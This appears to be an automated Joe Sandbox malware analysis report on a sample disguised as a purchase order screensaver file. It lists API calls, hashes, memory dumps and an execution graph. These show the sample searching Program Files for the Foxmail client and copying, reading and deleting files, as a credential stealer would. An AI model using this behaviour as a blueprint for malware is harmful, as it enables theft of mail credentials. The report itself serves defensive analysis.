                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                      • String ID: Error launching installer
                                                                                                      • API String ID: 3712363035-66219284
                                                                                                      • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                                                                      • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                                                                      • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                                                                      • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76232EE0,00403861,76233420,0040366C,?), ref: 004038A4
                                                                                                      • GlobalFree.KERNEL32(?), ref: 004038AB
                                                                                                      Strings
                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040389C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                      • API String ID: 1100898210-3936084776
                                                                                                      • Opcode ID: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                                                                      • Instruction ID: 78adfbc6f23a2b3c20b59446217b09faef23a1eee4c9d5cf742f1d2697954a66
                                                                                                      • Opcode Fuzzy Hash: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                                                                      • Instruction Fuzzy Hash: 2FE08C339041205BC621AF25AC08B1AB7A86F89B32F0581B6F9807B2A183746C624BD9
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,80000000,00000003), ref: 004059E5
                                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,80000000,00000003), ref: 004059F5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharPrevlstrlen
                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                      • API String ID: 2709904686-3125694417
                                                                                                      • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                      • Instruction ID: c27c0225baf4744af390cb43684771b46df34b65c4403afa93d532b781e968ba
                                                                                                      • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                      • Instruction Fuzzy Hash: A8D05EB3400920DAD3226B04DC0199F73ACEF1131074644AAF501A21A5DB785D808BBD
                                                                                                      APIs
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2232296174.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2232279863.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232310367.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232326142.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_10000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$Free$Alloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1780285237-0
                                                                                                      • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                      • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                      • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                      • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                      APIs
                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                                                                      • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                                                                      • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                                                                      • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                      • String ID:
                                                                                                      • API String ID: 190613189-0
                                                                                                      • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                      • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                                                                      • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                      • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:1.7%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0.5%
                                                                                                      Total number of Nodes:215
                                                                                                      Total number of Limit Nodes:5
                                                                                                      execution_graph 8870 37001c5b 8871 37001c6b ___scrt_fastfail 8870->8871 8874 370012ee 8871->8874 8873 37001c87 8875 37001324 ___scrt_fastfail 8874->8875 8876 370013b7 GetEnvironmentVariableW 8875->8876 8900 370010f1 8876->8900 8879 370010f1 57 API calls 8880 37001465 8879->8880 8881 370010f1 57 API calls 8880->8881 8882 37001479 8881->8882 8883 370010f1 57 API calls 8882->8883 8884 3700148d 8883->8884 8885 370010f1 57 API calls 8884->8885 8886 370014a1 8885->8886 8887 370010f1 57 API calls 8886->8887 8888 370014b5 lstrlenW 8887->8888 8889 370014d9 lstrlenW 8888->8889 8899 370014d2 8888->8899 8890 370010f1 57 API calls 8889->8890 8891 37001501 lstrlenW lstrcatW 8890->8891 8892 370010f1 57 API calls 8891->8892 8893 37001539 lstrlenW lstrcatW 8892->8893 8894 370010f1 57 API calls 8893->8894 8895 3700156b lstrlenW lstrcatW 8894->8895 8896 370010f1 57 API calls 8895->8896 8897 3700159d lstrlenW lstrcatW 8896->8897 8898 370010f1 57 API calls 8897->8898 8898->8899 8899->8873 8901 37001118 ___scrt_fastfail 8900->8901 8902 37001129 lstrlenW 8901->8902 8913 37002c40 8902->8913 8904 37001148 lstrcatW lstrlenW 8905 37001177 lstrlenW FindFirstFileW 8904->8905 8906 37001168 lstrlenW 8904->8906 8907 370011a0 8905->8907 8908 370011e1 8905->8908 8906->8905 8909 370011c7 FindNextFileW 8907->8909 8910 370011aa 8907->8910 8908->8879 8909->8907 8912 370011da FindClose 8909->8912 8910->8909 8915 37001000 8910->8915 8912->8908 8914 37002c57 8913->8914 8914->8904 8914->8914 8916 37001022 ___scrt_fastfail 8915->8916 8917 370010af 8916->8917 8918 3700102f lstrcatW lstrlenW 8916->8918 8919 370010b5 lstrlenW 8917->8919 8931 370010ad 8917->8931 8920 3700105a lstrlenW 8918->8920 8921 3700106b lstrlenW 8918->8921 8946 37001e16 8919->8946 8920->8921 8932 37001e89 lstrlenW 8921->8932 8924 370010ca 8927 37001e89 5 API calls 8924->8927 8924->8931 8925 37001088 GetFileAttributesW 8926 3700109c 8925->8926 8925->8931 8926->8931 8938 3700173a 8926->8938 8928 370010df 8927->8928 8951 370011ea 8928->8951 8931->8910 8933 37002c40 ___scrt_fastfail 8932->8933 8934 37001ea7 lstrcatW lstrlenW 8933->8934 8935 37001ed1 lstrcatW 8934->8935 8936 37001ec2 8934->8936 8935->8925 8936->8935 8937 37001ec7 lstrlenW 8936->8937 8937->8935 8939 37001747 ___scrt_fastfail 8938->8939 8966 37001cca 8939->8966 8943 3700199f 8943->8931 8944 37001824 ___scrt_fastfail _strlen 8944->8943 8986 370015da 8944->8986 8947 37001e29 8946->8947 8950 37001e4c 8946->8950 8948 37001e2d lstrlenW 8947->8948 8947->8950 8949 37001e3f lstrlenW 8948->8949 8948->8950 8949->8950 8950->8924 8952 3700120e ___scrt_fastfail 8951->8952 8953 37001e89 5 API calls 8952->8953 8954 37001220 GetFileAttributesW 8953->8954 8955 37001246 8954->8955 8956 37001235 8954->8956 8957 37001e89 5 API calls 8955->8957 8956->8955 8958 3700173a 35 API calls 8956->8958 8959 37001258 8957->8959 8958->8955 8960 370010f1 56 API calls 8959->8960 8961 3700126d 8960->8961 8962 37001e89 5 API calls 8961->8962 8963 3700127f ___scrt_fastfail 8962->8963 8964 370010f1 56 API calls 8963->8964 8965 370012e6 8964->8965 8965->8931 8967 37001cf1 ___scrt_fastfail 8966->8967 8968 37001d0f CopyFileW CreateFileW 8967->8968 8969 37001d44 DeleteFileW 8968->8969 8970 37001d55 GetFileSize 8968->8970 8975 37001808 8969->8975 8971 37001ede 22 API calls 8970->8971 8972 37001d66 ReadFile 8971->8972 8973 37001d94 CloseHandle DeleteFileW 8972->8973 8974 37001d7d CloseHandle DeleteFileW 8972->8974 8973->8975 8974->8975 8975->8943 8976 37001ede 8975->8976 8978 3700222f 8976->8978 8979 3700224e 8978->8979 8982 37002250 8978->8982 8994 3700474f 8978->8994 8999 370047e5 8978->8999 8979->8944 8981 37002908 8983 370035d2 __CxxThrowException@8 RaiseException 8981->8983 8982->8981 9006 370035d2 8982->9006 8985 37002925 8983->8985 8985->8944 8987 3700160c _strcat _strlen 8986->8987 8988 3700163c lstrlenW 8987->8988 9094 37001c9d 8988->9094 8990 37001655 lstrcatW lstrlenW 8991 37001678 8990->8991 8992 3700167e lstrcatW 8991->8992 8993 37001693 ___scrt_fastfail 8991->8993 8992->8993 8993->8944 9009 37004793 8994->9009 8997 3700478f 8997->8978 8998 37004765 9015 37002ada 8998->9015 9001 370056d0 _abort 8999->9001 9000 3700570e 9028 37006368 9000->9028 9001->9000 9003 370056f9 RtlAllocateHeap 9001->9003 9005 3700474f _abort 7 API calls 9001->9005 9003->9001 9004 3700570c 9003->9004 9004->8978 9005->9001 9008 370035f2 RaiseException 9006->9008 9008->8981 9010 3700479f ___scrt_is_nonwritable_in_current_image 9009->9010 9022 37005671 RtlEnterCriticalSection 9010->9022 9012 370047aa 9023 370047dc 9012->9023 9014 370047d1 _abort 9014->8998 9016 37002ae3 9015->9016 9017 37002ae5 IsProcessorFeaturePresent 9015->9017 9016->8997 9019 37002b58 9017->9019 9027 37002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9019->9027 9021 37002c3b 9021->8997 9022->9012 9026 370056b9 RtlLeaveCriticalSection 9023->9026 9025 370047e3 9025->9014 9026->9025 9027->9021 9031 37005b7a GetLastError 9028->9031 9032 37005b93 9031->9032 9033 37005b99 9031->9033 9050 37005e08 9032->9050 9036 37005bf0 SetLastError 9033->9036 9057 3700637b 9033->9057 9038 37005bf9 9036->9038 9038->9004 9039 37005bb3 9064 3700571e 9039->9064 9043 37005bb9 9045 37005be7 SetLastError 9043->9045 9044 37005bcf 9077 3700593c 9044->9077 9045->9038 9048 3700571e _free 17 API calls 9049 37005be0 9048->9049 9049->9036 9049->9045 9082 37005c45 9050->9082 9052 37005e2f 9053 37005e47 TlsGetValue 9052->9053 9054 37005e3b 9052->9054 9053->9054 9055 37002ada _ValidateLocalCookies 5 API calls 9054->9055 9056 37005e58 9055->9056 9056->9033 9062 37006388 _abort 9057->9062 9058 370063c8 9061 37006368 __dosmaperr 19 API calls 9058->9061 9059 370063b3 RtlAllocateHeap 9060 37005bab 9059->9060 9059->9062 9060->9039 9070 37005e5e 9060->9070 9061->9060 9062->9058 9062->9059 9063 3700474f _abort 7 API calls 9062->9063 9063->9062 9065 37005729 HeapFree 9064->9065 9069 37005752 __dosmaperr 9064->9069 9066 3700573e 9065->9066 9065->9069 9067 37006368 __dosmaperr 18 API calls 9066->9067 9068 37005744 GetLastError 9067->9068 9068->9069 9069->9043 9071 37005c45 _abort 5 API calls 9070->9071 9072 37005e85 9071->9072 9073 37005ea0 TlsSetValue 9072->9073 9076 37005e94 9072->9076 9073->9076 9074 37002ada _ValidateLocalCookies 5 API calls 9075 37005bc8 9074->9075 9075->9039 9075->9044 9076->9074 9088 37005914 9077->9088 9085 37005c71 9082->9085 9087 37005c75 __crt_fast_encode_pointer 9082->9087 9083 37005c95 9086 37005ca1 GetProcAddress 9083->9086 9083->9087 9084 37005ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 9084->9085 9085->9083 9085->9084 9085->9087 9086->9087 9087->9052 9089 37005854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 9088->9089 9090 37005938 9089->9090 9091 370058c4 9090->9091 9092 37005758 _abort 20 API calls 9091->9092 9093 370058e8 9092->9093 9093->9048 9095 37001ca6 _strlen 9094->9095 9095->8990 8838 3700c7a7 8839 3700c7be 8838->8839 8844 3700c82c 8838->8844 8839->8844 8850 3700c7e6 GetModuleHandleA 8839->8850 8841 3700c872 8842 3700c835 GetModuleHandleA 8845 3700c83f 8842->8845 8843 3700c7dd 8843->8844 8843->8845 8847 3700c800 GetProcAddress 8843->8847 8844->8841 8844->8842 8844->8845 8845->8844 8846 3700c85f GetProcAddress 8845->8846 8846->8844 8847->8844 8848 3700c80d VirtualProtect 8847->8848 8848->8844 8849 3700c81c VirtualProtect 8848->8849 8849->8844 8851 3700c7ef 8850->8851 8857 3700c82c 8850->8857 8862 3700c803 GetProcAddress 8851->8862 8853 3700c7f4 8856 3700c800 GetProcAddress 8853->8856 8853->8857 8854 3700c872 8855 3700c835 GetModuleHandleA 8859 3700c83f 8855->8859 8856->8857 8858 3700c80d VirtualProtect 8856->8858 8857->8854 8857->8855 8857->8859 8858->8857 8860 3700c81c VirtualProtect 8858->8860 8859->8857 8861 3700c85f GetProcAddress 8859->8861 8860->8857 8861->8857 8863 3700c82c 8862->8863 8864 3700c80d VirtualProtect 8862->8864 8866 3700c872 8863->8866 8867 3700c835 GetModuleHandleA 8863->8867 8864->8863 8865 3700c81c VirtualProtect 8864->8865 8865->8863 8869 3700c83f 8867->8869 8868 3700c85f GetProcAddress 8868->8869 8869->8863 8869->8868

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 37001137
                                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37001151
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3700115C
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3700116D
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3700117C
                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37001193
                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 370011D0
                                                                                                      • FindClose.KERNEL32(00000000), ref: 370011DB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                      • String ID:
                                                                                                      • API String ID: 1083526818-0
                                                                                                      • Opcode ID: c76bb54e3f886b6b7f2cbfdaa0d21050f850b972f0e456f2d0c3e795738d35bc
                                                                                                      • Instruction ID: 9576dc298fe27232ca4e423529282f1e76a360a1b79ef055a35f90f30064f390
                                                                                                      • Opcode Fuzzy Hash: c76bb54e3f886b6b7f2cbfdaa0d21050f850b972f0e456f2d0c3e795738d35bc
                                                                                                      • Instruction Fuzzy Hash: 552193715443086BE714EB64DC49FDB7BDCFF84324F00092ABA68E3190E774D6058BA6

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 37001434
                                                                                                        • Part of subcall function 370010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 37001137
                                                                                                        • Part of subcall function 370010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37001151
                                                                                                        • Part of subcall function 370010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3700115C
                                                                                                        • Part of subcall function 370010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3700116D
                                                                                                        • Part of subcall function 370010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3700117C
                                                                                                        • Part of subcall function 370010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37001193
                                                                                                        • Part of subcall function 370010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 370011D0
                                                                                                        • Part of subcall function 370010F1: FindClose.KERNEL32(00000000), ref: 370011DB
                                                                                                      • lstrlenW.KERNEL32(?), ref: 370014C5
                                                                                                      • lstrlenW.KERNEL32(?), ref: 370014E0
                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 3700150F
                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 37001521
                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 37001547
                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 37001553
                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 37001579
                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 37001585
                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 370015AB
                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 370015B7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                      • String ID: )$Foxmail$ProgramFiles
                                                                                                      • API String ID: 672098462-2938083778
                                                                                                      • Opcode ID: 305d2fab3f80a2114c67beff6a1ca26726f9aca3c6b19f4b5f6bc9e97d3357a7
                                                                                                      • Instruction ID: fd479b9a37a1ca2bbaa5a41c04506a35a88e63841a2d8b6b3ce7fad0ab3a40c9
                                                                                                      • Opcode Fuzzy Hash: 305d2fab3f80a2114c67beff6a1ca26726f9aca3c6b19f4b5f6bc9e97d3357a7
                                                                                                      • Instruction Fuzzy Hash: B581D275A00318A9EB20DBA0DC85FDE7378FF84710F1005EAF608E7190EAB55A85CF96

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(3700C7DD), ref: 3700C7E6
                                                                                                      • GetModuleHandleA.KERNEL32(?,3700C7DD), ref: 3700C838
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 3700C860
                                                                                                        • Part of subcall function 3700C803: GetProcAddress.KERNEL32(00000000,3700C7F4), ref: 3700C804
                                                                                                        • Part of subcall function 3700C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3700C7F4,3700C7DD), ref: 3700C816
                                                                                                        • Part of subcall function 3700C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3700C7F4,3700C7DD), ref: 3700C82A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 2099061454-0
                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                      • Instruction ID: 731a84f22fc6244b14547b8ac6f84c0740ba5a0dddc471af947af663edf22b48
                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                      • Instruction Fuzzy Hash: 3C012E70A493413CBA1042B40C04AFB6FD89B236B0B240BD6E11086193D9A48106CBAE

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 79 3700c7a7-3700c7bc 80 3700c82d 79->80 81 3700c7be-3700c7c6 79->81 83 3700c82f-3700c833 80->83 81->80 82 3700c7c8-3700c7f6 call 3700c7e6 81->82 90 3700c7f8 82->90 91 3700c86c-3700c86e 82->91 85 3700c872 call 3700c877 83->85 86 3700c835-3700c83d GetModuleHandleA 83->86 89 3700c83f-3700c847 86->89 89->89 92 3700c849-3700c84c 89->92 94 3700c7fa-3700c7fe 90->94 95 3700c85b-3700c85e 90->95 96 3700c870 91->96 97 3700c866-3700c86b 91->97 92->83 93 3700c84e-3700c850 92->93 98 3700c852-3700c854 93->98 99 3700c856-3700c85a 93->99 102 3700c865 94->102 103 3700c800-3700c80b GetProcAddress 94->103 100 3700c85f-3700c860 GetProcAddress 95->100 96->92 97->91 98->100 99->95 100->102 102->97 103->80 104 3700c80d-3700c81a VirtualProtect 103->104 105 3700c82c 104->105 106 3700c81c-3700c82a VirtualProtect 104->106 105->80 106->105
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(?,3700C7DD), ref: 3700C838
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 3700C860
                                                                                                        • Part of subcall function 3700C7E6: GetModuleHandleA.KERNEL32(3700C7DD), ref: 3700C7E6
                                                                                                        • Part of subcall function 3700C7E6: GetProcAddress.KERNEL32(00000000,3700C7F4), ref: 3700C804
                                                                                                        • Part of subcall function 3700C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3700C7F4,3700C7DD), ref: 3700C816
                                                                                                        • Part of subcall function 3700C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3700C7F4,3700C7DD), ref: 3700C82A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 2099061454-0
                                                                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                      • Instruction ID: e53b605041d83e6cbe3ca7d30d4785c736e231ac7da864f08a7a2ef8a7b1e29c
                                                                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                      • Instruction Fuzzy Hash: 632103764487816FF7118BB44C04BE77FD8DB172B0F1906D6D080CB283E5A89446CBAE

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
